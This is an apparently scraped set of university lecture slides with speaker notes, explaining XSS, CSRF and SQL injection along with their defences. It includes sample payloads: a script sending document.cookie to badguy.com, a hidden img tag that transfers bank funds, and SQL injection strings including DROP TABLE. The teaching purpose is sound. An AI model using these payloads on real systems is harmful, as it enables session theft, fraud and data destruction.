CSCD 303 Essential Computer Security Fall 2017

Size: px

Start display at page:

Download "CSCD 303 Essential Computer Security Fall 2017"

Laureen Park
6 years ago
Views:

1 CSCD 303 Essential Computer Security Fall 2017 Lecture 18a XSS, SQL Injection and CRSF Reading: See links - End of Slides

2 Overview Idea of XSS, CSRF and SQL injection is to violate the security of the Web Browser/Server system Inject content on web pages that trick users or Inject content on web pages that trick web servers Result is stolen resources or destruction of information

3 Web Based Attacks

4 Application Layer APPLICATION ATTACK Finance Accounts Transactions Administration E-Commerce Knowledge Mgmt Communication Custom Code Bus. Functions Databases Legacy Systems Web Services Directories Human Resrcs Billing Application Layer Attacker sends attacks inside valid HTTP requests Your custom code is tricked into doing something it should not Security requires software development expertise, not signatures Network Layer Firewall App Server Web Server Hardened OS Firewall Network Layer Firewall, hardening, patching, IDS, and SSL cannot detect or stop attacks inside HTTP requests. Security relies on signature databases Insider

5 Types of Web Attacks What kinds of Web attacks are popular? Inadequate validation of user input Named Attacks Below Cross site scripting, XSS Cross site request forgery, CSRF SQL Injection

6 Cross-site Scripting (XSS) Cross-site scripting (XSS) computer security vulnerability typically found in web applications Allows code injection by malicious web users into web pages viewed by other users Examples of such code include HTML code and clientside scripts An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as same origin policy for scripts As of 2017 cross-site scripting is among the top 10 web site problems

7 Same Origin Policy Web Scripts, Recall. Intent is to let users visit untrusted web sites without those web sites interfering with user's session with honest web sites Same-origin policy restricts how a document or script loaded from one origin can interact with a resource from another origin Two pages have same origin if the protocol, port (if one is specified), and host are the same for both pages URL Outcome Reason Success Success Failure Different protocol Failure Different port Failure Different host

8 Example Websites XSS d A hacker was able to insert JavaScript code into the Obama community blog section The JavaScript would redirect the users to the Hillary Clinton website obama-website-hacked-users-redirected-to-clinton-campaign.htm Websites from FBI.gov, CNN.com, Time.com, Ebay, Yahoo, Apple computer, Microsoft, Zdnet, Wired, and Newsbytes have all had XSS bugs List of websites XSS are here Example of XSS Attack

9 Cross Site Scripting (XSS) Recall Scripts embedded in web pages run in browsers Scripts can access cookies Get private information Manipulate page objects Controls what users see Scripts controlled by same-origin policy How could XSS occur? Web applications often take user inputs and use them as part of webpage 9

10 XSS Example User input is echoed into HTML response Example: Search field term = apple search.php responds with this page: <HTML> <TITLE> Search Results </TITLE> <BODY> Results for <?php echo $_GET[term]?> :... </BODY> </HTML> Is this exploitable?

11 XSS Example Attacker s Bad input Problem: No validation of input term Consider this link: term = <script> window.open( = + document.cookie ) </script> What if user clicks on this link? 1. Browser goes to victim.com/search.php 2. Victim.com returns <HTML> Results for <script> </script> Browser executes script: Sends badguy.com cookie for victim.com

12 XSS Results of this Attack Why would user click on such a link? Phishing in webmail client (e.g. gmail). Link in doubleclick banner ad many, many ways to fool user into clicking What if badguy.com gets cookie for victim.com? Cookie can include session authentication for victim.com Or other data intended only for victim.com Violates same origin policy

13 XSS Example However, there is a great site with many cut and paste opportunities to try this out A complete How to for XSS:

14 Preventing XSS Escape all user input when it is displayed Escaping converts the output to harmless html entities <script> becomes <script> but still displayed as <script> Methods: OWASP ESAPI Java Standard Tag Library (JSTL) <c:out/> OWASP XSS Prevention Cheat Sheet XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

15 Preventing XSS Security Expert Coding Recommendations use the Microsoft Anti-XSS Library

XSS Prevention Noscript Firefox Add-on Noscript: JavaScript, Java, Flash Silverlight and possibly other executable contents are blocked by default Will be able to

16 XSS Prevention Noscript Firefox Add-on Noscript: JavaScript, Java, Flash Silverlight and possibly other executable contents are blocked by default Will be able to allow JavaScript/Java/... execution (scripts from now on) selectively, on the sites you trust Must first enable Javascript in Firefox

17 Cross Site Request Forgery CSRF

18 What is Cross Site Request Forgery? Define it Cross-Site Request Forgery (CSRF) is an attack that tricks victim into loading a page that contains a malicious request It is malicious in the sense that it inherits the identity and privileges of the victim to perform an undesired function on the victim's behalf Change victim's address, Change home address, or Change password, or purchase something

1 Attacker sets the trap on some website on the

CSRF vulnerability Hidden <img> tag contains attack

Transactions Administration E-Commerce Knowledge

Functions 2 While logged into vulnerable site,victim

sends GET request (including credentials) to

19 1 Attacker sets the trap on some website on the internet (or simply via an ) Application with CSRF vulnerability Hidden <img> tag contains attack against vulnerable site Finance Accounts Transactions Administration E-Commerce Knowledge Communicatio Mgmt n Bus. Functions 2 While logged into vulnerable site,victim views attacker site <img> tag loaded by browser sends GET request (including credentials) to vulnerable site 3 Custom Code Vulnerable site sees legitimate request from victim and performs the action requested

20 Cross Site Request Forgery (CSRF) Cross Site Request Forgery, also XSRF or Cross Site Reference Forgery Works by exploiting trust of site for the user In the case of XSS, the user is the victim In the case of CSRF, the user is an accomplice. Example: Allows specific actions to be performed when requested If a user is logged into site and an attacker tricks their browser into making a request to one of these task urls, then task is performed for logged in user but the user didn t intend to do it

21 Dangers of CSRF Most of the functionality allowed by website can be performed by an attacker utilizing CSRF What does this mean for victims? This could include Posting content to a message board, Subscribing to an online newsletter, Performing stock trades, using a shopping cart, or Even sending an e-card

22 CSRF More Details The most popular ways to execute CSRF attacks Using a HTML image tag, or JavaScript image object An attacker will embed these into an or website so when user loads page or , they perform a web request to any URL of attackers liking Examples follow

23 'Image' Object <script> var foo = new Image(); foo.src = " </script> CSRF Code Examples HTML Methods IMG SRC <img src=" SCRIPT SRC <script src=" IFRAME SRC <iframe src=" JavaScript Methods

24 Another CSRF Example Say, online banking site performs a transfer of funds action by calling a URL such as: transfer.do?acct=attacker&amount=1000 This URL will transfer $1000 from a victim s account into the attacker s account if the victim is logged into their account within BigSafeBank website

CSRF Example Attacker must fool victim into clicking link and executing malicious action Attacker can create an HTML email with a tag such as: <img src="http://bigsafebank.com/transfer.do?

25 CSRF Example Attacker must fool victim into clicking link and executing malicious action Attacker can create an HTML with a tag such as: <img src=" acct=attacker&amount=1000" width="1" height="1" border="0"> When a victim views this HTML , Will see an error indicating that image could not be loaded, But browser still submits transfer request to bigsafebank.com without requiring any further interaction from the user

26 CSRF Example Crazy part is Even though the image was rendered unsuccessfully, Using <img> tag, an automatic http request was made that contained the victim's credentials, Ie. Session Cookie Allowing the server to perform the malicious action

27 CSRF Why Does it Happen A web application's vulnerability to CSRF is due to the following conditions: The use of certain HTML tags will result in automatic HTTP Request execution. Our browsers have no way of telling if a resource referenced by an <img> tag is a legitimate image The loading of an image will happen regardless of where that image is located.

28 CSRF Why Does it Happen More reasons why... Code within web application performs security sensitive operations in response to requests without validation of user GET requests are especially vulnerable to this type of attack, but POST requests are not immune

29 Fixing CSRF with CSRF Guard The Open Web Application Security Project (OWASP) Developed a tool, CSRF Guard to implement session-token idea to thwart CSRF attacks When user first visits site, application will generate and store a session specific unique request token This session specific unique request token is then placed in each form and link of HTML response, ensuring that this value will be submitted with the next request For each subsequent request, application must verify existence of unique token parameter and compare its value to that of value stored in user's session

30 SQL Injection

31 SQL Injection Very Common vulnerability (~71 attacks/hour ) Exploits Web apps Use Databases Poorly validate user input for SQL string literal escape characters, e.g., ' Do not have strongly screened user input Example escape characters "SELECT * FROM users WHERE name = '" + username + "';" If username is set to ' or '1'='1, the resulting SQL is SELECT * FROM users WHERE name = '' OR '1'='1'; This evaluates to SELECT * FROM users displays all users

32 SQL Injection Example Select statement "SELECT * FROM userinfo WHERE id = " + a_variable + ";" If programmer doesn t check a_variable is a number, attacker can set a_variable = 1; DROP TABLE users SQL evaluates to SELECT * FROM userinfo WHERE id=1;drop TABLE users; Result of this query? Users table is deleted

33 Impact of SQL Injection - Dangerous At best: you can leak information Depending on your configuration, a hacker can Delete, alter or create data Grant direct access to the hacker Escalate privileges and even take over the OS

34 Preventing SQL injection Use Prepared Statements $id=1234 select * from accounts where id = + $id Next one is safer More exact select * from accounts where id =1234 Validate input Strong typing If the id parameter is a number, try parsing it into an integer Business logic validation Escape questionable characters ticks, --, semi-colon, brackets OWASP Cheat sheet

35 Summary Experts suggest, Internet Security model is completely flawed Made worse by Web 2.0 As developers we can at least ensure our code is not broken As users we have far less control Browser security!!!!

36 References CSRF Links CGI FAQ on Cross Site Request Forgery (CSRF) Art of Software Security Assessment Same Origin OWASP CSRF Site MSDN Article on CSRF Explained Wikipedia

37 References XSS html

38 References SQL Injection Cheat Sheet SQL Prevention njection.html SQL Attacks from UnixWiz OWASP SQL Injection _Sheet

39 End Lab this week, XSS and CSRF and SQL Injection

43 Application Layer Network Layer APPLICATION ATTACK Firewall Finance Accounts Transactions Administration App Server Web Server Bus. Functions E-Commerce Knowledge Mgmt Communication Custom Code Hardened OS Firewall Databases Legacy Systems Web Services Directories Human Resrcs Billing Application Layer Attacker sends attacks inside valid HTTP requests Your custom code is tricked into doing something it should not Security requires software development expertise, not signatures Network Layer Firewall, hardening, patching, IDS, and SSL cannot detect or stop attacks inside HTTP requests. Security relies on signature databases Insider 11/15/17 4 Ed- Main Point: Application layer security works differently from network security. Teaching Points: 1. Explain the difference between network security and application security. 2. Why SSL is not enough. 3. What are the bad guys after? 4. Explain what a signature database is (notices if an attack is happening).

44 5

46 Same Origin Policy Web Scripts, Recall. Intent is to let users visit untrusted web sites without those web sites interfering with user's session with honest web sites Same-origin policy restricts how a document or script loaded from one origin can interact with a resource from another origin Two pages have same origin if the protocol, port (if one is specified), and host are the same for both pages URL Outcome Reason Success Success Failure Different protocol Failure Different port Failure Different host 11/15/17 7

47 Example Websites XSS d A hacker was able to insert JavaScript code into the Obama community blog section The JavaScript would redirect the users to the Hillary Clinton website obama-website-hacked-users-redirected-to-clinton-campaign.htm Websites from FBI.gov, CNN.com, Time.com, Ebay, Yahoo, Apple computer, Microsoft, Zdnet, Wired, and Newsbytes have all had XSS bugs List of websites XSS are here Example of XSS Attack 11/15/17 8

53 Preventing XSS Escape all user input when it is displayed Escaping converts the output to harmless html entities <script> becomes <script> but still displayed as <script> Methods: OWASP ESAPI Java Standard Tag Library (JSTL) <c:out/> OWASP XSS Prevention Cheat Sheet XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet 11/15/17 14

54 Preventing XSS Security Expert Coding Recommendations use the Microsoft Anti-XSS Library 11/15/17 15

56 Cross Site Request Forgery CSRF 11/15/17 17

57 What is Cross Site Request Forgery? Define it Cross-Site Request Forgery (CSRF) is an attack that tricks victim into loading a page that contains a malicious request It is malicious in the sense that it inherits the identity and privileges of the victim to perform an undesired function on the victim's behalf Change victim's address, Change home address, or Change password, or purchase something 11/15/17 18

1 Attacker sets the trap on some website on the internet (or simply via an e-mail) Application with CSRF vulnerability 2 Hidden <img> tag contains attack against vulnerable site While logged into

Functions E-Commerce Knowledge Communicatio Mgmt n Custom Code Vulnerable site sees legitimate request from victim and performs the action requested Ed- Main Point: This is how a CSRF attack works.

Malicious request automatically sent to vulnerable site (if in IMG tag or something similar), or user might actually click on or submit something to initiate the request (i.e., phishing like attack).

58 1 Attacker sets the trap on some website on the internet (or simply via an ) Application with CSRF vulnerability 2 Hidden <img> tag contains attack against vulnerable site While logged into vulnerable site,victim views attacker site <img> tag loaded by browser sends GET request (including credentials) to vulnerable site 11/15/ Finance Accounts Transactions Administration Bus. Functions E-Commerce Knowledge Communicatio Mgmt n Custom Code Vulnerable site sees legitimate request from victim and performs the action requested Ed- Main Point: This is how a CSRF attack works. Teaching Points: 1. Attacker lures victim to read some malicious content (in web site or e- mail) 2. Malicious request automatically sent to vulnerable site (if in IMG tag or something similar), or user might actually click on or submit something to initiate the request (i.e., phishing like attack). 3. IF THE CONDITIONS ARE RIGHT, then the malicious request will include the victim s credentials when sent to the vulnerable site. If it works, the unauthorized transaction will be accepted, or the unauthorized request will return sensitive data to the attacker. 4. Regardless of success or failure of the attack, the attack itself is typically completely invisible to the potential victim.

68 29

69 SQL Injection 11/15/17 30

70 SQL Injection Very Common vulnerability (~71 attacks/hour ) Exploits Web apps Use Databases Poorly validate user input for SQL string literal escape characters, e.g., ' Do not have strongly screened user input Example escape characters "SELECT * FROM users WHERE name = '" + username + "';" If username is set to ' or '1'='1, the resulting SQL is SELECT * FROM users WHERE name = '' OR '1'='1'; This evaluates to SELECT * FROM users displays all users 11/15/17 31

71 SQL Injection Example Select statement "SELECT * FROM userinfo WHERE id = " + a_variable + ";" If programmer doesn t check a_variable is a number, attacker can set a_variable = 1; DROP TABLE users SQL evaluates to SELECT * FROM userinfo WHERE id=1;drop TABLE users; Result of this query? Users table is deleted 11/15/17 32

72 Impact of SQL Injection - Dangerous At best: you can leak information Depending on your configuration, a hacker can Delete, alter or create data Grant direct access to the hacker Escalate privileges and even take over the OS 11/15/17 33

73 Preventing SQL injection Use Prepared Statements $id=1234 select * from accounts where id = + $id Next one is safer More exact select * from accounts where id =1234 Validate input Strong typing If the id parameter is a number, try parsing it into an integer Business logic validation Escape questionable characters ticks, --, semi-colon, brackets OWASP Cheat sheet 11/15/17 34

77 References SQL Injection Cheat Sheet SQL Prevention njection.html SQL Attacks from UnixWiz OWASP SQL Injection _Sheet 11/15/17 38

CSCD 303 Essential Computer Security Fall 2018

CSCD 303 Essential Computer Security Fall 2018 Lecture 17 XSS, SQL Injection and CRSF Reading: See links - End of Slides Overview Idea of XSS, CSRF and SQL injection is to violate security of Web Browser/Server